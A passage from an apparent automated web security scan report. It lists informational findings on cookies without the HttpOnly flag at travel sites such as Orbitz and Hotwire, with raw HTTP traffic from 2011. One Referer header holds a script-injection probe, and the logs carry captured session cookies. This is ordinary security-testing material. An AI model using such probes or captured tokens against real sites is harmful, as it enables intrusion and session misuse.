Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//GfFEXccZLnQ9cx0NaloS+foj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; auth=true; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Set-Cookie: gsc=3; Expires=Mon, 03-Oct-2011 06:59:59 GMT; Path=/
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34JgBIItf8EEvK/oj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; Expires=Tue, 02-Oct-2012 00:38:25 GMT; Path=/
Set-Cookie: hotwirePageModuleState=pgoodCode=H&searchTokenId=1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 288536


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...
14.255. http://www.hotwire.com/hotel/search-options.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/search-options.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/search-options.jsp?sid=S250&bid=B260711&inputId=hotel-index&destCity=bos&startDay=09&startMonth=10&endDay=16&endMonth=10&noOfAdults=1&numRooms=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi7ltrG1IPXfIeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLVq8LlP5r5sVC9LqYt6r1WejbBqGtX4/QeMydTsx5XDmME0qOPB8zW5aGoplccEyUVyAQw1zoB77fdKkw2wifeN3QXc3uxCTtpmp1Xbz0DxcS4cKS1iGZ7tDS9ulFNeBvx/qJTKhJwy7rJEih5XSyT1Fco8d5rZFOYJfrLMMzpj5kMJEILR9qBNRDl+42pRMtKzavwDRm7Zn4S+YVpyXk9PjDFsc8boH4pNL/i/1SO3SnXZq06Bmb1cMu94wvBIzddV6cWSVnTSkb6zEWjyhKcj/R/L14UAfRNxKLA1dwarM4dx9zfvTJdnTQ5OD8cXu1QsRQx6bhBdHgkaVvI7Yv0CzgZubBDGYZ2py/gVN6nUboAKdWWhnH1+SCb4zGbUyOIkF4m3Q5L+mHwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx75u8crr6cftWqHj6w1ad2e3Pf5CFEtJtPeidw2FziNaUnrZUO8Dg4khW7hU9cY7J7fKZ4GRKCUFiaqRBwocDhg2nL+BU3qdRuu3nLjE0iKGkecN3QDSwuy2hpe08Csu2fupUbvdFv0Cs+iPYTYOKXR36I9hNg4pdHfoj2E2Dil0d+iPYTYOKXR36I9hNg4pdHZkXMwFjN5//l477VJL34Ji0R3huVJCIXPoj2E2Dil0d+iPYTYOKXR0HbQ0daheJbt99vtzXseEa+iPYTYOKXR1PInMvNwnP4qWAQ5Fqf/sURmHo2YOoPtSM+3JgIIVvgfoj2E2Dil0dfPSXg9UVFkdonRAnD1CzZSScdfGLoqChRdyjkfXmqOcml0c5X6k8GJajsUKRNqS+Ouz/Wdyu4BraAnioKq60T2Ii7hTLeddfkVbI7P1I/pc=; Expires=Tue, 02-Oct-2012 00:37:52 GMT; Path=/
Set-Cookie: gsc=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: auth=true; Path=/
Location: /hotel/search-options.jsp?numRooms=1&endDay=16&startDay=09&noOfAdults=1&startMonth=10&endMonth=10&destCity=bos&inputId=hotel-index
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:52 GMT
Content-Length: 152

<html><head><title>301 Permanently</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved Permanently.</p>
</body></html>
14.256. http://www.igougo.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-5; mbox=PC#1317601622475-177474.19#1318816337|check#true#1317606797|session#1317606736569-208906#1317608597

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47F12FA5D4186;path=/;
X-SL-CompState: Uncompiled
X-Strangeloop: ViewState,Compression
Content-Length: 40510


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   

<meta http-equiv="X-UA-Compatible" content="IE=Emulate
...[SNIP]...
14.257. http://www.igougo.com/traveldeals/ratefinder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:27:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...
14.258. http://www.luminate.com/widget/53d1ac1014/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/53d1ac1014/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widget/53d1ac1014/ HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:50:23 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVa PSAa PSDa OUR OTR IND OTC"
Expires: Sun, 02 Oct 2011 23:55:23 GMT
Content-Type: application/javascript
Cache-Control: private, max-age=300
Set-Cookie: shoptube_id=f6d10bcb0c; expires=Mon, 01 Oct 2012 23:50:23 GMT; Max-Age=31536000; Path=/
Vary: Accept-Encoding
X-Cache: MISS from lb3-sv.int.pixazza.com
X-Cache-Lookup: MISS from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

if (typeof(pixazza) == 'undefined') {
document.write('<script type="text/javascript">pixazza = luminate = {};<\/script>');
document.write('<script type="text/javascript" src="http://static.luminate.co
...[SNIP]...
14.259. http://www.orbitz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:06:46 GMT
Content-Length: 174769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
14.260. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
14.261. http://www.orbitz.com/App/ViewDHTMLCalendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewDHTMLCalendar

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewDHTMLCalendar?z=7473&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 960
Date: Mon, 03 Oct 2011 00:06:52 GMT
Content-Length: 960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...
14.262. http://www.orbitz.com/App/ViewFlightSearchResults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...
14.263. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
